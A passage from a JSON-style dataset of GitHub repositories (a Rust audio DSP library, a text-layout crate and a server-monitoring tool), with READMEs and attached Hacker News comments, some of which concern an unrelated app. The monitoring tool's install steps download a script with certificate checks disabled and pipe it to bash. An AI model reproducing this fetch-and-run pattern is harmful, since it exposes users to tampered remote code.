"gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "RustAudio/dasp", "link": "https://github.com/RustAudio/dasp", "tags": [], "stars": 659, "description": "The fundamentals for Digital Audio Signal Processing. Formerly `sample`.", "lang": "Rust", "repo_lang": "", "readme": "# dasp [![Actions Status][dasp-actions-svg]][dasp-actions] [![docs.rs][dasp-docs-rs-svg]][dasp-docs-rs]\n\n**Digital Audio Signal Processing in Rust.**\n\n*Formerly the [`sample` crate](https://crates.io/crates/sample).*\n\nA suite of crates providing the fundamentals for working with PCM (pulse-code\nmodulation) DSP (digital signal processing). In other words, `dasp` provides a\nsuite of low-level, high-performance tools including types, traits and functions\nfor working with digital audio signals.\n\nThe `dasp` libraries require **no dynamic allocations**1 and have\n**no dependencies**. The goal is to design a library akin to the **std, but for\naudio DSP**; keeping the focus on portable and fast fundamentals.\n\n1: Besides the feature-gated `SignalBus` trait, which is occasionally\nuseful when converting a `Signal` tree into a directed acyclic graph.\n\nFind the [API documentation here][dasp-docs-rs].\n\n\n## Crates\n\n**dasp** is a modular collection of crates, allowing users to select the precise\nset of tools required for their project. The following crates are included\nwithin this repository:\n\n| **Library** | **Links** | **Description** |\n| --- | --- | --- |\n| [**`dasp`**][dasp] | [![Crates.io][dasp-crates-io-svg]][dasp-crates-io] [![docs.rs][dasp-docs-rs-svg]][dasp-docs-rs] | Top-level API with features for all crates. |\n| [**`dasp_sample`**][dasp_sample] | [![Crates.io][dasp_sample-crates-io-svg]][dasp_sample-crates-io] [![docs.rs][dasp_sample-docs-rs-svg]][dasp_sample-docs-rs] | Sample trait, types, conversions and operations. |\n| [**`dasp_frame`**][dasp_frame] | [![Crates.io][dasp_frame-crates-io-svg]][dasp_frame-crates-io] [![docs.rs][dasp_frame-docs-rs-svg]][dasp_frame-docs-rs] | Frame trait, types, conversions and operations. |\n| [**`dasp_slice`**][dasp_slice] | [![Crates.io][dasp_slice-crates-io-svg]][dasp_slice-crates-io] [![docs.rs][dasp_slice-docs-rs-svg]][dasp_slice-docs-rs] | Conversions and ops for slices of samples/frames. |\n| [**`dasp_ring_buffer`**][dasp_ring_buffer] | [![Crates.io][dasp_ring_buffer-crates-io-svg]][dasp_ring_buffer-crates-io] [![docs.rs][dasp_ring_buffer-docs-rs-svg]][dasp_ring_buffer-docs-rs] | Simple fixed and bounded ring buffers. |\n| [**`dasp_peak`**][dasp_peak] | [![Crates.io][dasp_peak-crates-io-svg]][dasp_peak-crates-io] [![docs.rs][dasp_peak-docs-rs-svg]][dasp_peak-docs-rs] | Peak detection with half/full pos/neg wave rectifiers. |\n| [**`dasp_rms`**][dasp_rms] | [![Crates.io][dasp_rms-crates-io-svg]][dasp_rms-crates-io] [![docs.rs][dasp_rms-docs-rs-svg]][dasp_rms-docs-rs] | RMS detection with configurable window. |\n| [**`dasp_envelope`**][dasp_envelope] | [![Crates.io][dasp_envelope-crates-io-svg]][dasp_envelope-crates-io] [![docs.rs][dasp_envelope-docs-rs-svg]][dasp_envelope-docs-rs] | Envelope detection with peak and RMS impls. |\n| [**`dasp_interpolate`**][dasp_interpolate] | [![Crates.io][dasp_interpolate-crates-io-svg]][dasp_interpolate-crates-io] [![docs.rs][dasp_interpolate-docs-rs-svg]][dasp_interpolate-docs-rs] | Inter-frame rate interpolation (linear, sinc, etc). |\n| [**`dasp_window`**][dasp_window] | [![Crates.io][dasp_window-crates-io-svg]][dasp_window-crates-io] [![docs.rs][dasp_window-docs-rs-svg]][dasp_window-docs-rs] | Windowing function abstraction (hann, rectangle). |\n| [**`dasp_signal`**][dasp_signal] | [![Crates.io][dasp_signal-crates-io-svg]][dasp_signal-crates-io] [![docs.rs][dasp_signal-docs-rs-svg]][dasp_signal-docs-rs] | Iterator-like API for streams of audio frames. |\n| [**`dasp_graph`**][dasp_graph] | [![Crates.io][dasp_graph-crates-io-svg]][dasp_graph-crates-io] [![docs.rs][dasp_graph-docs-rs-svg]][dasp_graph-docs-rs] | For working with modular, dynamic audio graphs. |\n\n[![deps-graph][deps-graph]][deps-graph]\n\n*Red dotted lines indicate optional dependencies, while black lines indicate\nrequired dependencies.*\n\n\n## Features\n\nUse the **Sample** trait to convert between and remain generic over any\nbit-depth in an optimal, performance-sensitive manner. Implementations are\nprovided for all signed integer, unsigned integer and floating point primitive\ntypes along with some custom types including 11, 20, 24 and 48-bit signed and\nunsigned unpacked integers. For example:\n\n```rust\nassert_eq!((-1.0).to_sample::(), 0);\nassert_eq!(0.0.to_sample::(), 128);\nassert_eq!(0i32.to_sample::(), 2_147_483_648);\nassert_eq!(I24::new(0).unwrap(), Sample::from_sample(0.0));\nassert_eq!(0.0, Sample::EQUILIBRIUM);\n```\n\nUse the **Frame** trait to remain generic over the number of channels at a\ndiscrete moment in time. Implementations are provided for all fixed-size arrays\nup to 32 elements in length.\n\n```rust\nlet foo = [0.1, 0.2, -0.1, -0.2];\nlet bar = foo.scale_amp(2.0);\nassert_eq!(bar, [0.2, 0.4, -0.2, -0.4]);\n\nassert_eq!(Mono::::EQUILIBRIUM, [0.0]);\nassert_eq!(Stereo::::EQUILIBRIUM, [0.0, 0.0]);\nassert_eq!(<[f32; 3]>::EQUILIBRIUM, [0.0, 0.0, 0.0]);\n\nlet foo = [0i16, 0];\nlet bar: [u8; 2] = foo.map(Sample::to_sample);\nassert_eq!(bar, [128u8, 128]);\n```\n\nUse the **Signal** trait (enabled by the \"signal\" feature) for working with\ninfinite-iterator-like types that yield `Frame`s. **Signal** provides methods\nfor adding, scaling, offsetting, multiplying, clipping, generating, monitoring\nand buffering streams of `Frame`s. Working with **Signal**s allows for easy,\nreadable creation of rich and complex DSP graphs with a simple and familiar API.\n\n```rust\n// Clip to an amplitude of 0.9.\nlet frames = [[1.2, 0.8], [-0.7, -1.4]];\nlet clipped: Vec<_> = signal::from_iter(frames.iter().cloned()).clip_amp(0.9).take(2).collect();\nassert_eq!(clipped, vec![[0.9, 0.8], [-0.7, -0.9]]);\n\n// Add `a` with `b` and yield the result.\nlet a = [0.2, -0.6, 0.5];\nlet b = [0.2, 0.1, -0.8];\nlet a_signal = signal::from_iter(a.iter().cloned());\nlet b_signal = signal::from_iter(b.iter().cloned());\nlet added: Vec = a_signal.add_amp(b_signal).take(3).collect();\nassert_eq!(added, vec![0.4, -0.5, -0.3]);\n\n// Scale the playback rate by `0.5`.\nlet foo = [0.0, 1.0, 0.0, -1.0];\nlet mut source = signal::from_iter(foo.iter().cloned());\nlet a = source.next();\nlet b = source.next();\nlet interp = Linear::new(a, b);\nlet frames: Vec<_> = source.scale_hz(interp, 0.5).take(8).collect();\nassert_eq!(&frames[..], &[0.0, 0.5, 1.0, 0.5, 0.0, -0.5, -1.0, -0.5][..]);\n\n// Convert a signal to its RMS.\nlet signal = signal::rate(44_100.0).const_hz(440.0).sine();;\nlet ring_buffer = ring_buffer::Fixed::from([0.0; WINDOW_SIZE]);\nlet mut rms_signal = signal.rms(ring_buffer);\n```\n\nThe **signal** module also provides a series of **Signal** source types,\nincluding:\n\n- `FromIterator`\n- `FromInterleavedSamplesIterator`\n- `Equilibrium` (silent signal)\n- `Phase`\n- `Sine`\n- `Saw`\n- `Square`\n- `Noise`\n- `NoiseSimplex`\n- `Gen` (generate frames from a Fn() -> F)\n- `GenMut` (generate frames from a FnMut() -> F)\n\nUse the **slice** module functions (enabled via the \"slice\" feature) for\nprocessing chunks of `Frame`s. Conversion functions are provided for safely\nconverting between slices of interleaved `Sample`s and slices of `Frame`s\nwithout requiring any allocation. For example:\n\n```rust\nlet frames = &[[0.0, 0.5], [0.0, -0.5]][..];\nlet samples = slice::to_sample_slice(frames);\nassert_eq!(samples, &[0.0, 0.5, 0.0, -0.5][..]);\n\nlet samples = &[0.0, 0.5, 0.0, -0.5][..];\nlet frames = slice::to_frame_slice(samples);\nassert_eq!(frames, Some(&[[0.0, 0.5], [0.0, -0.5]][..]));\n\nlet samples = &[0.0, 0.5, 0.0][..];\nlet frames = slice::to_frame_slice(samples);\nassert_eq!(frames, None::<&[[f32; 2]]>);\n```\n\nThe **signal::interpolate** module provides a **Converter** type, for converting\nand interpolating the rate of **Signal**s. This can be useful for both sample\nrate conversion and playback rate multiplication. **Converter**s can use a range\nof interpolation methods, with Floor, Linear, and Sinc interpolation provided in\nthe library.\n\nThe **ring_buffer** module provides generic **Fixed** and **Bounded** ring\nbuffer types, both of which may be used with owned, borrowed, stack and\nallocated buffers.\n\nThe **peak** module can be used for monitoring the peak of a signal. Provided\npeak rectifiers include `full_wave`, `positive_half_wave` and\n`negative_half_wave`.\n\nThe **rms** module provides a flexible **Rms** type that can be used for RMS\n(root mean square) detection. Any **Fixed** ring buffer can be used as the\nwindow for the RMS detection.\n\nThe **envelope** module provides a **Detector** type (also known as a\n*Follower*) that allows for detecting the envelope of a signal. **Detector** is\ngeneric over the type of **Detect**ion - **Rms** and **Peak** detection are\nprovided. For example:\n\n```rust\nlet signal = signal::rate(4.0).const_hz(1.0).sine();\nlet attack = 1.0;\nlet release = 1.0;\nlet detector = envelope::Detector::peak(attack, release);\nlet mut envelope = signal.detect_envelope(detector);\nassert_eq!(\n envelope.take(4).collect::>(),\n vec![0.0, 0.6321205496788025, 0.23254416035257117, 0.7176687675647109]\n);\n```\n\n\n## `no_std`\n\nAll crates may be compiled with and without the std library. The std library is\nenabled by default, however it may be disabled via `--no-default-features`.\n\nTo enable all of a crate's features *without* the std library, you may use\n`--no-default-features --features \"all-no-std\"`.\n\nPlease note that some of the crates require the `core_intrinsics` feature in\norder to be able to perform operations like `sin`, `cos` and `powf32` in a\n`no_std` context. This means that these crates require the nightly toolchain in\norder to build in a `no_std` context.\n\n\n## Contributing\n\nIf **dasp** is missing types, conversions or other fundamental functionality\nthat you wish it had, feel free to open an issue or pull request! The more\nhands on deck, the merrier :)\n\n\n## License\n\nLicensed under either of\n\n * Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or http://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nat your option.\n\n**Contributions**\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in the work by you, as defined in the Apache-2.0 license, shall be\ndual licensed as above, without any additional terms or conditions.\n\n\n[dasp-actions]: https://github.com/rustaudio/dasp/actions\n[dasp-actions-svg]: https://github.com/rustaudio/dasp/workflows/dasp/badge.svg\n[deps-graph]: ./assets/deps-graph.png\n[dasp]: ./dasp\n[dasp-crates-io]: https://crates.io/crates/dasp\n[dasp-crates-io-svg]: https://img.shields.io/crates/v/dasp.svg\n[dasp-docs-rs]: https://docs.rs/dasp/\n[dasp-docs-rs-svg]: https://docs.rs/dasp/badge.svg\n[dasp_envelope]: ./dasp_envelope\n[dasp_envelope-crates-io]: https://crates.io/crates/dasp_envelope\n[dasp_envelope-crates-io-svg]: https://img.shields.io/crates/v/dasp_envelope.svg\n[dasp_envelope-docs-rs]: https://docs.rs/dasp_envelope/\n[dasp_envelope-docs-rs-svg]: https://docs.rs/dasp_envelope/badge.svg\n[dasp_frame]: ./dasp_frame\n[dasp_frame-crates-io]: https://crates.io/crates/dasp_frame\n[dasp_frame-crates-io-svg]: https://img.shields.io/crates/v/dasp_frame.svg\n[dasp_frame-docs-rs]: https://docs.rs/dasp_frame/\n[dasp_frame-docs-rs-svg]: https://docs.rs/dasp_frame/badge.svg\n[dasp_graph]: ./dasp_graph\n[dasp_graph-crates-io]: https://crates.io/crates/dasp_graph\n[dasp_graph-crates-io-svg]: https://img.shields.io/crates/v/dasp_graph.svg\n[dasp_graph-docs-rs]: https://docs.rs/dasp_graph/\n[dasp_graph-docs-rs-svg]: https://docs.rs/dasp_graph/badge.svg\n[dasp_interpolate]: ./dasp_interpolate\n[dasp_interpolate-crates-io]: https://crates.io/crates/dasp_interpolate\n[dasp_interpolate-crates-io-svg]: https://img.shields.io/crates/v/dasp_interpolate.svg\n[dasp_interpolate-docs-rs]: https://docs.rs/dasp_interpolate/\n[dasp_interpolate-docs-rs-svg]: https://docs.rs/dasp_interpolate/badge.svg\n[dasp_peak]: ./dasp_peak\n[dasp_peak-crates-io]: https://crates.io/crates/dasp_peak\n[dasp_peak-crates-io-svg]: https://img.shields.io/crates/v/dasp_peak.svg\n[dasp_peak-docs-rs]: https://docs.rs/dasp_peak/\n[dasp_peak-docs-rs-svg]: https://docs.rs/dasp_peak/badge.svg\n[dasp_ring_buffer]: ./dasp_ring_buffer\n[dasp_ring_buffer-crates-io]: https://crates.io/crates/dasp_ring_buffer\n[dasp_ring_buffer-crates-io-svg]: https://img.shields.io/crates/v/dasp_ring_buffer.svg\n[dasp_ring_buffer-docs-rs]: https://docs.rs/dasp_ring_buffer/\n[dasp_ring_buffer-docs-rs-svg]: https://docs.rs/dasp_ring_buffer/badge.svg\n[dasp_rms]: ./dasp_rms\n[dasp_rms-crates-io]: https://crates.io/crates/dasp_rms\n[dasp_rms-crates-io-svg]: https://img.shields.io/crates/v/dasp_rms.svg\n[dasp_rms-docs-rs]: https://docs.rs/dasp_rms/\n[dasp_rms-docs-rs-svg]: https://docs.rs/dasp_rms/badge.svg\n[dasp_sample]: ./dasp_sample\n[dasp_sample-crates-io]: https://crates.io/crates/dasp_sample\n[dasp_sample-crates-io-svg]: https://img.shields.io/crates/v/dasp_sample.svg\n[dasp_sample-docs-rs]: https://docs.rs/dasp_sample/\n[dasp_sample-docs-rs-svg]: https://docs.rs/dasp_sample/badge.svg\n[dasp_signal]: ./dasp_signal\n[dasp_signal-crates-io]: https://crates.io/crates/dasp_signal\n[dasp_signal-crates-io-svg]: https://img.shields.io/crates/v/dasp_signal.svg\n[dasp_signal-docs-rs]: https://docs.rs/dasp_signal/\n[dasp_signal-docs-rs-svg]: https://docs.rs/dasp_signal/badge.svg\n[dasp_slice]: ./dasp_slice\n[dasp_slice-crates-io]: https://crates.io/crates/dasp_slice\n[dasp_slice-crates-io-svg]: https://img.shields.io/crates/v/dasp_slice.svg\n[dasp_slice-docs-rs]: https://docs.rs/dasp_slice/\n[dasp_slice-docs-rs-svg]: https://docs.rs/dasp_slice/badge.svg\n[dasp_window]: ./dasp_window\n[dasp_window-crates-io]: https://crates.io/crates/dasp_window\n[dasp_window-crates-io-svg]: https://img.shields.io/crates/v/dasp_window.svg\n[dasp_window-docs-rs]: https://docs.rs/dasp_window/\n[dasp_window-docs-rs-svg]: https://docs.rs/dasp_window/badge.svg\n", "readme_type": "markdown", "hn_comments": "All codes are gone :(Thanks a lot for your response. It's beacuse of all of you that the post made it to the first page of hackernews. This kind of appreciation means so much :)Please find some more promo codes for the app below:7JEF3YKF4M6M\nHTEMPJYPA63M\n4T7RF9KJ9FJ4\n3TYWKK4A363H\nJ7KA7AYHJ7ER\nEYLA6NJX4FHJ\nWTNARFLK7LY4\n4WT9M6TA43KN\nWMTNT6LN63PJ\nMHWEHXXNLLNKThe codes have all been usedLooks pretty neat, and maybe a simple utility app that looks neat is just the way to go on the App Store.One thing that caught my eye though was: why are the launch images not filled with the numbers? On a similar note, though--I don't have an idea how to solve that while still using lauch images--the launch image is white, changing themes, killing the app and restarting it hence results in a visible flickr.That said, I did sometimes have trouble hitting the keys, due to the inactive space in between.What are the promo codes for?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "pop-os/cosmic-text", "link": "https://github.com/pop-os/cosmic-text", "tags": [], "stars": 658, "description": "Pure Rust multi-line text handling", "lang": "Rust", "repo_lang": "", "readme": "# COSMIC Text\n\n[![crates.io](https://img.shields.io/crates/v/cosmic-text.svg)](https://crates.io/crates/cosmic-text)\n[![docs.rs](https://docs.rs/cosmic-text/badge.svg)](https://docs.rs/cosmic-text)\n![license](https://img.shields.io/crates/l/cosmic-text.svg)\n[![Rust workflow](https://github.com/pop-os/cosmic-text/workflows/Rust/badge.svg?event=push)](https://github.com/pop-os/cosmic-text/actions)\n\nPure Rust multi-line text handling.\n\nCOSMIC Text provides advanced text shaping, layout, and rendering wrapped up\ninto a simple abstraction. Shaping is provided by rustybuzz, and supports a\nwide variety of advanced shaping operations. Rendering is provided by swash,\nwhich supports ligatures and color emoji. Layout is implemented custom, in safe\nRust, and supports bidirectional text. Font fallback is also a custom\nimplementation, reusing some of the static fallback lists in browsers such as\nChromium and Firefox. Linux, macOS, and Windows are supported with the full\nfeature set. Other platforms may need to implement font fallback capabilities.\n\n## Screenshots\n\nArabic translation of Universal Declaration of Human Rights\n[![Arabic screenshot](screenshots/arabic.png)](screenshots/arabic.png)\n\nHindi translation of Universal Declaration of Human Rights\n[![Hindi screenshot](screenshots/hindi.png)](screenshots/hindi.png)\n\nSimplified Chinese translation of Universal Declaration of Human Rights\n[![Simplified Chinses screenshot](screenshots/chinese-simplified.png)](screenshots/chinese-simplified.png)\n\n## Roadmap\n\nThe following features must be supported before this is \"ready\":\n\n- [x] Font loading (using fontdb)\n - [x] Preset fonts\n - [x] System fonts\n- [x] Text styles (bold, italic, etc.)\n - [x] Per-buffer\n - [x] Per-span\n- [x] Font shaping (using rustybuzz)\n - [x] Cache results\n - [x] RTL\n - [x] Bidirectional rendering\n- [x] Font fallback\n - [x] Choose font based on locale to work around \"unification\"\n - [x] Per-line granularity\n - [x] Per-character granularity\n- [x] Font layout\n - [x] Click detection\n - [x] Simple wrapping\n - [ ] Wrapping with indentation\n - [ ] No wrapping\n - [ ] Ellipsize\n- [x] Font rendering (using swash)\n - [x] Cache results\n - [x] Font hinting\n - [x] Ligatures\n - [x] Color emoji\n- [x] Text editing\n - [x] Performance improvements\n - [x] Text selection\n - [x] Can automatically recreate https://unicode.org/udhr/ without errors (see below)\n - [x] Bidirectional selection\n - [ ] Copy/paste\n- [x] no_std support (with `default-features = false`)\n - [ ] no_std font loading\n - [x] no_std shaping\n - [x] no_std layout\n - [ ] no_std rendering\n\nThe UDHR (Universal Declaration of Human Rights) test involves taking the entire\nset of UDHR translations (almost 500 languages), concatenating them as one file\n(which ends up being 8 megabytes!), then via the `editor-test` example,\nautomatically simulating the entry of that file into cosmic-text per-character,\nwith the use of backspace and delete tested per character and per line. Then,\nthe final contents of the buffer is compared to the original file. All of the\n106746 lines are correct.\n\n## License\n\nLicensed under either of\n\n * Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or\n http://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([LICENSE-MIT](LICENSE-MIT) or\n http://opensource.org/licenses/MIT)\n\nat your option.\n\n### Contribution\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in the work by you, as defined in the Apache-2.0 license, shall be\ndual licensed as above, without any additional terms or conditions.\n", "readme_type": "markdown", "hn_comments": "This sounds interesting, but the feature set isn't clear to me.Is this perhaps related to COSMIC initiative? See https://news.ycombinator.com/item?id=33259750", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zdz/ServerStatus-Rust", "link": "https://github.com/zdz/ServerStatus-Rust", "tags": ["rust", "serverstatus", "serverstatus-rust", "railway", "vnstat", "telegram", "wechat", "webhook", "probe"], "stars": 658, "description": "\u2728 Rust \u7248 ServerStatus \u63a2\u9488\u3001\u5a01\u529b\u52a0\u5f3a\u7248", "lang": "Rust", "repo_lang": "", "readme": "

\n \n

\u2728 Rust \u7248 ServerStatus \u4e91\u63a2\u9488

\n \n

\n\n
\n

\n \n \"Docker\"\n \n \n \"Release\"\n \n \"GitHub\n \n \n \"GitHub\n \n \n \"GitHub\n \n \n \"GitHub\n \n

\n
\n\n\"image\"\n\"image\"\n\n\n\n

Table of Contents

\n\n- [\u2728 Rust \u7248 ServerStatus \u4e91\u63a2\u9488](#-rust-\u7248-serverstatus-\u4e91\u63a2\u9488)\n - [1. \u4ecb\u7ecd](#1-\u4ecb\u7ecd)\n - [\ud83c\udf40 \u4e3b\u9898](#-\u4e3b\u9898)\n - [2. \u5b89\u88c5\u90e8\u7f72](#2-\u5b89\u88c5\u90e8\u7f72)\n - [2.1 \u5feb\u901f\u4f53\u9a8c](#21-\u5feb\u901f\u4f53\u9a8c)\n - [2.2 \u5feb\u901f\u90e8\u7f72](#22-\u5feb\u901f\u90e8\u7f72)\n - [2.3 \u670d\u52a1\u7ba1\u7406\u811a\u672c\u90e8\u7f72\uff0c\u611f\u8c22 @Colsro \u63d0\u4f9b](#23-\u670d\u52a1\u7ba1\u7406\u811a\u672c\u90e8\u7f72\u611f\u8c22-colsro-\u63d0\u4f9b)\n - [2.4 Railway \u90e8\u7f72](#24-railway-\u90e8\u7f72)\n - [3. \u670d\u52a1\u7aef\u8bf4\u660e](#3-\u670d\u52a1\u7aef\u8bf4\u660e)\n - [3.1 \u914d\u7f6e\u6587\u4ef6 `config.toml`](#31-\u914d\u7f6e\u6587\u4ef6-configtoml)\n - [3.2 \u670d\u52a1\u7aef\u8fd0\u884c](#32-\u670d\u52a1\u7aef\u8fd0\u884c)\n - [4. \u5ba2\u6237\u7aef\u8bf4\u660e](#4-\u5ba2\u6237\u7aef\u8bf4\u660e)\n - [4.1 Linux (`CentOS`, `Ubuntu`, `Debian`)](#41-linux-centos-ubuntu-debian)\n - [4.2 \u8de8\u5e73\u53f0\u7248\u672c (`Window`, `Linux`, `...`)](#42-\u8de8\u5e73\u53f0\u7248\u672c-window-linux-)\n - [5. \u5f00\u542f `vnstat` \u652f\u6301](#5-\u5f00\u542f-vnstat-\u652f\u6301)\n - [6. FAQ](#6-faq)\n - [7. \u76f8\u5173\u9879\u76ee](#7-\u76f8\u5173\u9879\u76ee)\n - [8. \u6700\u540e](#8-\u6700\u540e)\n\n## 1. \u4ecb\u7ecd\n `ServerStatus` \u5a01\u529b\u52a0\u5f3a\u7248\uff0c\u4fdd\u6301\u8f7b\u91cf\u548c\u7b80\u5355\u90e8\u7f72\uff0c\u589e\u52a0\u4ee5\u4e0b\u4e3b\u8981\u7279\u6027\uff1a\n\n- \u4f7f\u7528 `rust` \u5b8c\u5168\u91cd\u5199 `server`\u3001`client`\uff0c\u5355\u4e2a\u6267\u884c\u6587\u4ef6\u90e8\u7f72\n- \u591a\u7cfb\u7edf\u652f\u6301 `Linux`\u3001`MacOS`\u3001`Windows`\u3001`Android`\u3001`Raspberry Pi`\n- \u652f\u6301\u4e0a\u4e0b\u7ebf\u548c\u7b80\u5355\u81ea\u5b9a\u4e49\u89c4\u5219\u544a\u8b66 (`telegram`\u3001`wechat`\u3001`email`\u3001`webhook`)\n- \u652f\u6301 `http` \u534f\u8bae\u4e0a\u62a5\uff0c\u65b9\u4fbf\u90e8\u7f72\u5230\u5404\u514d\u8d39\u5bb9\u5668\u670d\u52a1\u548c\u914d\u5408 `cf` \u7b49\u4f18\u5316\u4e0a\u62a5\u94fe\u8def\n- \u652f\u6301 `vnstat` \u7edf\u8ba1\u6708\u6d41\u91cf\uff0c\u91cd\u542f\u4e0d\u4e22\u6d41\u91cf\u6570\u636e\n- \u652f\u6301 `railway` \u5feb\u901f\u90e8\u7f72\n- \u652f\u6301 `systemd` \u5f00\u673a\u81ea\u542f\n- \u5176\u5b83\u529f\u80fd\uff0c\u5982 \ud83d\uddfa\ufe0f \u89c1 [wiki](https://github.com/zdz/ServerStatus-Rust/wiki)\n\n\u6f14\u793a\uff1a[ssr.rs](https://ssr.rs) | [cn dns](https://ck.ssr.rs)\n|\n\u4e0b\u8f7d\uff1a[Releases](https://github.com/zdz/ServerStatus-Rust/releases)\n|\n[Changelog](https://github.com/zdz/ServerStatus-Rust/releases)\n|\n\u53cd\u9988\uff1a[Discussions](https://github.com/zdz/ServerStatus-Rust/discussions)\n\n\ud83d\udcd5 \u5b8c\u6574\u6587\u6863\u8fc1\u79fb\u81f3 [doc.ssr.rs](https://doc.ssr.rs)\n\n| OS | Release |\n| ---- | ---- |\n| Linux x86_64 | x86_64-unknown-linux-musl |\n| Linux arm64 | aarch64-unknown-linux-musl |\n| MacOS x86_64 | x86_64-apple-darwin |\n| MacOS arm64 | aarch64-apple-darwin |\n| Windows x86_64 | x86_64-pc-windows-msvc |\n| Raspberry Pi | armv7-unknown-linux-musleabihf |\n| Android 64bit | aarch64-linux-android |\n| Android 32bit | armv7-linux-androideabi |\n\n### \ud83c\udf40 \u4e3b\u9898\n\n\u5982\u679c\u4f60\u89c9\u5f97\u4f60\u521b\u9020/\u4fee\u6539\u7684\u4e3b\u9898\u8fd8\u4e0d\u9519\uff0c\u6b22\u8fce\u5206\u4eab/PR\uff0c\u524d\u7aef\u5355\u72ec\u90e8\u7f72\u65b9\u6cd5\u53c2\u8003 [#37](https://github.com/zdz/ServerStatus-Rust/discussions/37)\n\n
\n Hotaru \u4e3b\u9898\n\nHotaru \u4e3b\u9898\u7531 [@HinataKato](https://github.com/HinataKato) \u4fee\u6539\u63d0\u4f9b\uff0c[\u4e3b\u9898\u5730\u5740](https://github.com/HinataKato/hotaru_theme_for_RustVersion)\n\n\"image\"\n\n
\n\n
\n ServerStatus-web \u4e3b\u9898\n\nServerStatus-web \u4e3b\u9898\u7531 [@mjjrock](https://github.com/mjjrock) \u4fee\u6539\u63d0\u4f9b\uff0c[\u4e3b\u9898\u5730\u5740](https://github.com/mjjrock/ServerStatus-web)\n\n\"image\"\n\n
\n\n\n
\n v1.5.7 \u7248\u672c\u4e3b\u9898\n\n[\u6f14\u793a\uff1aDemo](https://tz-rust.vercel.app)\n\n\"image\"\n
\n\n## 2. \u5b89\u88c5\u90e8\u7f72\n\n### 2.1 \u5feb\u901f\u4f53\u9a8c\n```bash\n# for CentOS/Debian/Ubuntu x86_64\nmkdir -p /opt/ServerStatus && cd /opt/ServerStatus\n# apt install -y unzip / yum install -y unzip\nwget --no-check-certificate -qO one-touch.sh 'https://raw.githubusercontent.com/zdz/ServerStatus-Rust/master/one-touch.sh'\nbash -ex one-touch.sh\n# \u90e8\u7f72\u5b8c\u6bd5\uff0c\u6253\u5f00 http://127.0.0.1:8080/ \u6216 http://<\u4f60\u7684IP>:8080/\n# \u81ea\u5b9a\u4e49\u90e8\u7f72\u53ef\u53c2\u7167 one-touch.sh \u811a\u672c\n```\n\n### 2.2 \u5feb\u901f\u90e8\u7f72\n\n\ud83d\udc49 [\u5feb\u901f\u90e8\u7f72](https://doc.ssr.rs/rapid_deploy)\n\n### 2.3 \u670d\u52a1\u7ba1\u7406\u811a\u672c\u90e8\u7f72\uff0c\u611f\u8c22 [@Colsro](https://github.com/Colsro) \u63d0\u4f9b\n
\n \u7ba1\u7406\u811a\u672c\u4f7f\u7528\u8bf4\u660e\n\n```bash\n# \u4e0b\u8f7d\u811a\u672c\nwget --no-check-certificate -qO status.sh 'https://raw.githubusercontent.com/zdz/ServerStatus-Rust/master/status.sh'\n\n# \u5b89\u88c5 \u670d\u52a1\u7aef\nbash status.sh -i -s\n\n# \u5b89\u88c5 \u5ba2\u6237\u7aef\nbash status.sh -i -c\n# or\nbash status.sh -i -c protocol://username:password@master:port\n# eg:\nbash status.sh -i -c grpc://h1:p1@127.0.0.1:9394\nbash status.sh -i -c http://h1:p1@127.0.0.1:8080\n\n# \u66f4\u591a\u7528\u6cd5\uff1a\n\u276f bash status.sh\n\nhelp:\n -i,--install \u5b89\u88c5 Status\n -i -s \u5b89\u88c5 Server\n -i -c \u5b89\u88c5 Client\n -i -c conf \u81ea\u52a8\u5b89\u88c5 Client\n -u,--uninstall \u5378\u8f7d Status\n -u -s \u5378\u8f7d Server\n -u -c \u5378\u8f7d Client\n -r,--reset \u66f4\u6539 Status \u914d\u7f6e\n -r \u66f4\u6539 Client \u914d\u7f6e\n -r conf \u81ea\u52a8\u66f4\u6539 Client\u914d\u7f6e\n -s,--server \u7ba1\u7406 Status \u8fd0\u884c\u72b6\u6001\n -s {start|stop|restart}\n -c,--client \u7ba1\u7406 Client \u8fd0\u884c\u72b6\u6001\n -c {start|stop|restart}\n\n\u82e5\u65e0\u6cd5\u8bbf\u95ee Github:\n CN=true bash status.sh args\n# \u53ef\u80fd\u6709\u70b9\u7528\n```\n
\n\n\n### 2.4 Railway \u90e8\u7f72\n\n\u61d2\u5f97\u914d\u7f6e `Nginx`\uff0c`SSL` \u8bc1\u4e66\uff1f\u8bd5\u8bd5\n[\u5728 Railway \u90e8\u7f72 Server](https://github.com/zdz/ServerStatus-Rust/wiki/Railway)\n\n[![Deploy on Railway](https://railway.app/button.svg)](https://railway.app/new/template/kzT46l?referralCode=pJYbdU)\n\n\n## 3. \u670d\u52a1\u7aef\u8bf4\u660e\n\n### 3.1 \u914d\u7f6e\u6587\u4ef6 `config.toml`\n```toml\n# \u4fa6\u542c\u5730\u5740, ipv6 \u4f7f\u7528 [::]:9394\ngrpc_addr = \"0.0.0.0:9394\"\nhttp_addr = \"0.0.0.0:8080\"\n# \u9ed8\u8ba430s\u65e0\u4e0a\u62a5\u5224\u5b9a\u4e0b\u7ebf\noffline_threshold = 30\n\n# \u7ba1\u7406\u5458\u8d26\u53f7,\u4e0d\u8bbe\u7f6e\u9ed8\u8ba4\u968f\u673a\u751f\u6210\uff0c\u7528\u4e8e\u67e5\u770b /detail, /map\nadmin_user = \"\"\nadmin_pass = \"\"\n\n# hosts \u8ddf hosts_group \u4e24\u79cd\u914d\u7f6e\u6a21\u5f0f\u4efb\u6311\u4e00\u79cd\u914d\u7f6e\u5373\u53ef\n# name \u4e3b\u673a\u552f\u4e00\u6807\u8bc6\uff0c\u4e0d\u53ef\u91cd\u590d\uff0calias \u4e3a\u5c55\u793a\u540d\n# notify = false \u5355\u72ec\u7981\u6b62\u5355\u53f0\u673a\u5668\u7684\u544a\u8b66\uff0c\u4e00\u822c\u9488\u5bf9\u7f51\u7edc\u5dee\uff0c\u9891\u7e41\u4e0a\u4e0b\u7ebf\n# monthstart = 1 